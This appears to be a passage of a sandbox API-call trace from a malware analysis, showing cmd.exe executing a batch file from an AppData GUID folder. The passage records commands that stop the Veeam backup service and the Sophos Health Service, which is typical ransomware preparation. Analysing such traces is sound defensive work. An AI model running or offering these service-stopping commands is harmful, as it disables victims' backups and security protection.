_wcsicmp (_String1="net", _String2="DPATH") returned 10 [0042.683] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0042.683] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0042.683] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0042.683] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0042.683] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0042.683] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0042.683] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0042.683] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0042.683] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0042.683] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0042.683] SetErrorMode (uMode=0x0) returned 0x1 [0042.683] GetProcessHeap () returned 0x3e0000 [0042.683] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0042.683] GetProcessHeap () returned 0x3e0000 [0042.683] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0042.683] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.683] GetProcessHeap () returned 0x3e0000 [0042.683] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0042.684] GetProcessHeap () returned 0x3e0000 [0042.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0042.684] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0042.684] GetProcessHeap () returned 0x3e0000 [0042.684] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0042.684] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.684] GetProcessHeap () returned 0x3e0000 [0042.684] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0042.684] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0042.684] GetProcessHeap () returned 0x3e0000 [0042.684] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0042.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.684] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.684] GetLastError () returned 0x2 [0042.684] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.684] GetLastError () returned 0x2 [0042.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.685] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0042.685] GetLastError () returned 0x2 [0042.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0042.685] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0042.685] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.685] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0042.685] SetErrorMode (uMode=0x0) returned 0x1 [0042.685] GetProcessHeap () returned 0x3e0000 [0042.685] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0042.685] GetProcessHeap () returned 0x3e0000 [0042.685] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0042.686] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0042.686] GetProcessHeap () returned 0x3e0000 [0042.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0042.686] GetProcessHeap () returned 0x3e0000 [0042.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0042.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0042.686] GetProcessHeap () returned 0x3e0000 [0042.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0042.686] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0042.686] GetProcessHeap () returned 0x3e0000 [0042.686] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0042.686] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0042.686] GetProcessHeap () returned 0x3e0000 [0042.686] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0042.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.686] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.686] GetLastError () returned 0x2 [0042.686] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.686] GetLastError () returned 0x2 [0042.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0042.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.686] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0042.687] GetLastError () returned 0x2 [0042.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0042.687] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0042.687] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0042.687] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0042.687] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0042.687] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0042.687] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0042.687] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop VeeamTransportSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop VeeamTransportSvc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop VeeamTransportSvc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x53c, dwThreadId=0x358)) returned 1 [0042.691] CloseHandle (hObject=0x78) returned 1 [0042.691] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0042.691] GetProcessHeap () returned 0x3e0000 [0042.691] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0042.691] GetEnvironmentStringsW () returned 0x3f8408* [0042.691] GetProcessHeap () returned 0x3e0000 [0042.691] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0042.691] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0042.691] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0043.022] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0043.027] CloseHandle (hObject=0x74) returned 1 [0043.034] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0043.034] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0043.039] GetProcessHeap () returned 0x3e0000 [0043.039] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.039] GetEnvironmentStringsW () returned 0x3f8408* [0043.039] GetProcessHeap () returned 0x3e0000 [0043.039] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.039] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.039] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0043.039] GetProcessHeap () returned 0x3e0000 [0043.039] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.039] GetEnvironmentStringsW () returned 0x3f8408* [0043.039] GetProcessHeap () returned 0x3e0000 [0043.039] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.039] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.039] GetProcessHeap () returned 0x3e0000 [0043.039] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0043.039] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0043.039] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.039] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0043.040] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.040] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0043.040] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.040] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0043.040] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.040] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0043.040] SetConsoleInputExeNameW () returned 0x1 [0043.040] GetConsoleOutputCP () returned 0x1b5 [0043.040] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0043.041] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.041] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0043.041] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0043.041] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.041] SetFilePointer (in: hFile=0x74, lDistanceToMove=1721, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6b9 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0043.041] GetProcessHeap () returned 0x3e0000 [0043.041] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0043.042] GetProcessHeap () returned 0x3e0000 [0043.042] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0043.042] GetProcessHeap () returned 0x3e0000 [0043.042] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0043.042] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.042] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6b9 [0043.042] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1208, lpOverlapped=0x0) returned 1 [0043.042] SetFilePointer (in: hFile=0x74, lDistanceToMove=1762, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e2 [0043.042] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=41, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ΓÇ£Sophos Health ServiceΓÇ¥ /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 41 [0043.042] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.042] GetFileType (hFile=0x74) returned 0x1 [0043.042] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.042] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6e2 [0043.042] GetProcessHeap () returned 0x3e0000 [0043.042] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0043.042] GetProcessHeap () returned 0x3e0000 [0043.042] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0043.050] _tell (_FileHandle=3) returned 1762 [0043.050] _close (_FileHandle=3) returned 0 [0043.050] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0043.050] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0043.050] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0043.050] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0043.050] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0043.050] _wcsicmp (_String1="net", _String2="CD") returned 11 [0043.050] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0043.050] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0043.050] _wcsicmp (_String1="net", _String2="REN") returned -4 [0043.050] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0043.050] _wcsicmp (_String1="net", _String2="SET") returned -5 [0043.051] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0043.051] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0043.051] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0043.051] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0043.051] _wcsicmp (_String1="net", _String2="MD") returned 1 [0043.051] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0043.051] _wcsicmp (_String1="net", _String2="RD") returned -4 [0043.051] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0043.051] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0043.051] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0043.051] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0043.051] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0043.051] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0043.051] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0043.051] _wcsicmp (_String1="net", _String2="VER") returned -8 [0043.051] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0043.051] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0043.051] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0043.051] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0043.051] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0043.051] _wcsicmp (_String1="net", _String2="START") returned -5 [0043.051] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0043.051] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0043.051] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0043.051] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0043.051] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0043.051] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0043.051] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0043.051] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0043.051] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0043.051] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0043.051] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0043.052] SetErrorMode (uMode=0x0) returned 0x1 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0043.052] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0043.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0043.052] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0043.052] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0043.052] GetProcessHeap () returned 0x3e0000 [0043.052] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0043.052] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.052] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.052] GetLastError () returned 0x2 [0043.052] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.053] GetLastError () returned 0x2 [0043.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.053] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.053] GetLastError () returned 0x2 [0043.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.053] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.053] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.053] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0043.053] SetErrorMode (uMode=0x0) returned 0x1 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0043.054] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0043.054] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0043.054] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0043.054] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0043.054] GetProcessHeap () returned 0x3e0000 [0043.054] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0043.054] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.054] GetLastError () returned 0x2 [0043.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.054] GetLastError () returned 0x2 [0043.054] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.055] 